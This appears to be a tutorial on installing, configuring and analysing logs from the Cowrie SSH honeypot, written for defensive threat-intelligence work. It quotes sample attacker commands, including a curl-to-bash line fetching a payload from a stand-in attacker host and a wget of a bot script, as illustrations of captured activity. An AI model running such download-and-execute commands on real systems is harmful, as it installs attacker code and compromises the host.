Introduction
Cowrie is a medium-interaction SSH honeypot that simulates a vulnerable SSH server, capturing attacker commands, credentials, and malware samples. By deploying Cowrie, security researchers can observe real-world attack patterns, collect threat intelligence, and understand how attackers behave once they gain access to a compromised system. This guide walks you through installation, configuration, and analysis of captured attack data.
What Is Cowrie?
Cowrie is an open-source honeypot that emulates an SSH server without providing real system access. When attackers attempt to compromise the honeypot, Cowrie logs all activity:
- Login attempts and credentials
- Commands executed
- Files downloaded
- Reverse shell attempts
- Privilege escalation techniques
Architecture: How Honeypots Work
Honeypot Layers
Internet ← [Attacker IP] → Cowrie SSH Honeypot (Port 22/Custom)
↓
Log Activity
Capture Malware
Track Patterns
Cowrie appears to be a real system but:
- Provides no real shell
- Contains no sensitive data
- Cannot affect your real infrastructure
- Logs everything attackers attempt
System Requirements
- Linux server (Ubuntu 20.04+ or Debian 11+)
- Python 3.7+
- 2GB RAM minimum (4GB+ recommended)
- Public IP address (for attracting real attackers)
- Dedicated user account (honeypot isolation)
Installation on Ubuntu/Debian
Step 1: Install Dependencies
sudo apt update
sudo apt install git python3 python3-pip python3-dev libffi-dev libssl-dev
Step 2: Create Honeypot User
sudo useradd -m -s /bin/bash cowrie
sudo su - cowrie
Step 3: Clone Cowrie Repository
git clone https://github.com/cowrie/cowrie.git
cd cowrie
Step 4: Install Python Dependencies
pip3 install --upgrade pip
pip3 install -r requirements.txt
cp etc/cowrie.conf.dist etc/cowrie.conf
Configuration
Edit cowrie.conf
Open the configuration file:
nano etc/cowrie.conf
Essential Settings
Listening Configuration:
[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0
ssh_type = paramiko
This makes Cowrie listen on port 2222. You can use port 22 if running as root (not recommended).
Hostname and System Information:
[honeypot]
hostname = debian
kernel_version = 4.19.0-5-generic
Set a realistic hostname and kernel to appear legitimate.
Backend Storage:
[database]
backend = file
Stores logs in text files. For large deployments, configure PostgreSQL.
Logging Verbosity:
[honeypot]
log_commands = true
log_timestamps = true
Ensures detailed command logging.
Starting Cowrie
Manual Start
bin/cowrie start
Verify It’s Running
netstat -tlnp | grep 2222
# OR
ss -tlnp | grep 2222
Check Logs
tail -f var/log/cowrie/cowrie.log
Test Connection (from another machine)
ssh -p 2222 root@honeypot.example.com
# Password: root (anything works)
Understanding Cowrie Logs
Honeypot Event Logs
cat var/log/cowrie/honeypot.log
Shows connections and commands:
2026-04-12 14:32:15 New connection from 203.0.113.45 (SSH-2.0-OpenSSH_7.4)
2026-04-12 14:32:20 Login attempt [root/12345]
2026-04-12 14:32:25 Command: whoami
2026-04-12 14:32:26 Command: id
2026-04-12 14:32:28 Command: wget http://malware.com/bot.sh
JSON Structured Logs
For analysis in tools like Splunk or Elasticsearch:
cat var/log/cowrie/cowrie.json
Each event as structured JSON for easy parsing.
Capturing Malware and Downloads
Enable Download Capture
By default, Cowrie simulates downloads without actually retrieving files. To capture real malware:
mkdir downloads
chmod 777 downloads
Edit cowrie.conf:
[honeypot]
download_path = /home/cowrie/downloads
Downloaded Files
When attackers execute commands like:
wget http://malware.example.com/bot
curl http://attacker.com/payload.sh | bash
Cowrie logs the URLs and can capture the files if configured.
Malware Analysis Workflow
- Monitor downloads: Check
downloads/ directory regularly
- Scan with antivirus:
clamscan downloads/*
- Upload to VirusTotal: Analyze without exposing your honeypot
- Extract indicators: IP addresses, domains, hashes
- Share intelligence: Report to abuse teams
Advanced Configuration: Port Forwarding
Expose Port 22 Safely
To attract more attackers, expose the SSH service on standard port 22:
Option 1: Run as root (not recommended):
[ssh]
listen_endpoints = tcp:22:interface=0.0.0.0
Option 2: Use iptables forwarding (better):
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
sudo iptables-save > /etc/iptables/rules.v4
Simulating System Responses
Fake /etc/passwd
Cowrie includes simulation files:
cat share/cowrie/fs.pickle
Customize the fake file system:
[honeypot]
filesystem = share/cowrie/fs.pickle
Fake Commands
Create responses to common reconnaissance commands:
# Simulate MySQL service
service mysql status
# Returns: "mysql is running"
# Simulate network info
ifconfig
# Returns: Fake IP configuration
Systemd Service for Persistence
Create Service File
sudo nano /etc/systemd/system/cowrie.service
[Unit]
Description=Cowrie SSH Honeypot
After=network.target
[Service]
Type=forking
User=cowrie
WorkingDirectory=/home/cowrie/cowrie
ExecStart=/home/cowrie/cowrie/bin/cowrie start
ExecStop=/home/cowrie/cowrie/bin/cowrie stop
[Install]
WantedBy=multi-user.target
Enable and Start
sudo systemctl daemon-reload
sudo systemctl enable cowrie
sudo systemctl start cowrie
Check Status
sudo systemctl status cowrie
Analyzing Attack Data
grep "New connection" var/log/cowrie/cowrie.log | awk '{print $NF}' | sort | uniq -c
Common Commands Executed
grep "Command:" var/log/cowrie/cowrie.log | awk -F'Command: ' '{print $2}' | sort | uniq -c | sort -rn
Failed Login Attempts
grep "Login attempt" var/log/cowrie/cowrie.log | wc -l
Most Targeted Usernames
grep "Login attempt" var/log/cowrie/cowrie.log | awk -F'[\\[\\]]' '{print $2}' | sort | uniq -c | sort -rn
Honey Files and Traps
Create Fake SSH Keys
To entice attackers to steal credentials:
mkdir -p var/lib/cowrie/.ssh
echo "fake-key-content" > var/lib/cowrie/.ssh/id_rsa
chmod 600 var/lib/cowrie/.ssh/id_rsa
Fake Credentials in Files
Cowrie can simulate discoverable credentials:
# Create fake database config
echo "mysql_user=root" > /fake/database.conf
echo "mysql_password=SecurePassword123" >> /fake/database.conf
Threat Intelligence Sharing
Compile attack indicators for sharing:
# Attacker IPs
grep "New connection" var/log/cowrie/cowrie.log | awk '{print $(NF-1)}' > attackers.txt
# Accessed URLs
grep "wget\|curl" var/log/cowrie/cowrie.log | awk -F'http' '{print "http"$2}' > urls.txt
# Malware hashes
sha256sum downloads/* > malware_hashes.txt
Report to Abuse Teams
- ABUSE.NET for hosting providers
- National CERT teams
- AbuseIPDB for IP reputation
- VirusTotal for malware analysis
Monitoring and Alerting
Alert on Suspicious Activity
For intrusion detection in real-time:
# Alert if many failed logins from single IP
tail -f var/log/cowrie/cowrie.log | grep "Login attempt" | grep "203.0.113.45"
Continuous Monitoring Setup
# Cron job to check for activity
*/30 * * * * grep "Login attempt" /home/cowrie/cowrie/var/log/cowrie/cowrie.log | tail -100 >> /var/log/cowrie_alerts.log
Security Considerations
Isolate the Honeypot
- Network segregation: Place on isolated subnet if possible
- Firewall rules: Block outbound connections from honeypot
- No real data: Never store actual credentials or files
- Monitoring: Watch for escape attempts
Prevent Real Breaches
While Cowrie is designed to be compromised:
- Run on dedicated VM or cloud instance
- Use separate credentials from real systems
- Monitor outbound traffic (attackers may try pivot)
- Keep Cowrie and dependencies patched
- Never connect to production network
Troubleshooting
Port Already in Use
sudo lsof -i :22
# Kill the process if needed
sudo kill -9 PID
Cowrie Won’t Start
Check logs:
cat var/log/cowrie/cowrie.log
Verify Python installation:
python3 --version
pip3 list | grep twisted
No SSH Connections
Ensure port is accessible:
sudo ufw allow 2222/tcp
sudo iptables -L -n | grep 2222
Conclusion
Cowrie provides invaluable threat intelligence by observing real attacker behavior. By deploying a honeypot, logging comprehensively, and analyzing patterns, you gain practical insights into attack techniques and tactics. Start with basic configuration in a lab environment, progress to port 22 exposure on a dedicated instance, and contribute your findings to the broader security community. This hands-on understanding of attacker behavior is invaluable for defensive security careers.